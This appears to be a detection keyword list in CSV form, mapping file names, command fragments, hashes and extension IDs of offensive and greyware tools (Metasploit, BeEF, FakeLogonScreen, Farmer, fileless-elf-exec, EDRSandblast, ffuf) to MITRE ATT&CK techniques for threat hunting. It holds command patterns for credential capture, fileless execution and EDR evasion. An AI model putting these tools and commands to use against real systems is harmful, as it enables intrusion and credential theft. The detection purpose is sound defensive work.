TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*Fake Computer Objects Honey Pots*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Fake Service Accounts Honey Tokens*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*fake_ap.py*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*fake_common_roots.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*fake_default_wordlist.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*fake_evernote_clipper*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*fake_flash_update*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*fake_lastpass/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*fake_notification_ff/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*FakeAMSI.c*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*FakeAMSI.dll*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*FakeAMSI.exe*,offensive_tool_keyword,FakeAMSI,Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence,T1117 - T1027,TA0003 ,N/A,N/A,Persistence,https://github.com/gtworek/PSBits/tree/master/FakeAMSI,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*FakeCmdLine.*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*FakeDriver.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*FakeDriver2.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*fakefuse.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*fakefuse.h*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*FakeImageExploiter*,offensive_tool_keyword,FakeImageExploiter,This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.,T1564 - T1218 - T1204 - T1558.001,TA0002 - TA0008 - TA0010,N/A,N/A,Phishing,https://github.com/r00t-3xp10it/FakeImageExploiter,1,1,N/A,N/A,9,843,356,2019-12-06T20:59:26Z,2017-04-04T20:53:47Z -*fakelogonscreen *,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,0,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*fakelogonscreen*.zip*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*FakeLogonScreen.csproj*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*fakelogonscreen.exe*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*FakeLogonScreen.sln*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*fakepath31337*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*FakePPID.*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*fake-sms-main*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*faketime '202* zsh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*farmer.exe *\windows\temp*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*farmer.exe 8888 60*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*Farmer\Farmer.csproj*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*Farmer-main.zip*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*fastfuz-chrome-ext*files.txt*,offensive_tool_keyword,fastfuzz,Fast fuzzing websites with chrome extension,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/tismayil/fastfuz-chrome-ext,1,1,N/A,N/A,1,23,3,2022-02-04T02:15:51Z,2022-02-04T00:22:51Z -*FastjsonScan.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*fasttrack/wordlist.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fatal: buffer_get_string: bad string*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*favfreak-http*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*fcfhplploccackoneaefokcmbjfbkenj*,greyware_tool_keyword,1clickVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fcrackzip *,offensive_tool_keyword,fcrackzip,a Free/Fast Zip Password Cracker,T1473 - T1021.002,TA0005 - TA0008,N/A,N/A,Credential Access,https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fcrackzip *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*fcrackzip -u -v -D -p *.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*fdcgdnkidjaadafnichfpabhfomcebme*,greyware_tool_keyword,ZenMate VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fde1b109f9704ff7.css*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,0,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*FE8F0D23-BDD1-416D-8285-F947BA86D155*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,0,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*fea01b74-7a60-4142-a54d-7aa8f6471c00*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*fee */* -l pl | perl*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*fee */* -l pl | ruby*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*fee -a *killall sshd* *busybox*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*fee -c */* | ssh *@*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*fee -c */* -w 64 | *,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*feroxbuster -w *fzf-wordlists* -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Fertiliser.exe \\*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*ff_osx_extension-dropper*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*FFA0FDDE-BE70-49E4-97DE-753304EF1113*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*FFA0FDDE-BE70-49E4-97DE-753304EF1113*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*ffbkglfijbcbgblgflchnbphjdllaogb*,greyware_tool_keyword,CyberGhost VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ffhhkmlgedgcliajaedapkdfigdobcif*,greyware_tool_keyword,Nucleus VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ffuf *-input-cmd*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf *-u http*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf -c *,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf -fs 185 -c -w *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ffuf -w *,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf.exe*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf/ffuf*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf_*_freebsd_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf_*_linux_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf_*_macOS_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*ffuf_*_openbsd_*.tar.gz*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - 